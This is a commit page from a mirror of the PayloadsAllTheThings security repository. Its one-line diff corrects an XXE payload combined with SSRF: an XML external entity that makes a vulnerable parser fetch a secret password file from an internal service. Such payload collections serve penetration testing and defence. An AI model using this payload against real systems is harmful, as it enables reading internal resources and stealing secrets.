mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-06 08:54:40 +01:00
Merge pull request #791 from piranhaAD/patch-1
Correcting the Payload for xxe ssrf
This commit is contained in:
commit
24527a5155
1 changed files with 1 additions and 1 deletions
|
|
@ -155,7 +155,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
|
||||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||||
<!DOCTYPE foo [
|
<!DOCTYPE foo [
|
||||||
<!ELEMENT foo ANY >
|
<!ELEMENT foo ANY >
|
||||||
<!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" >
|
<!ENTITY xxe SYSTEM "http://internal.service/secret_pass.txt" >
|
||||||
]>
|
]>
|
||||||
<foo>&xxe;</foo>
|
<foo>&xxe;</foo>
|
||||||
```
|
```
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue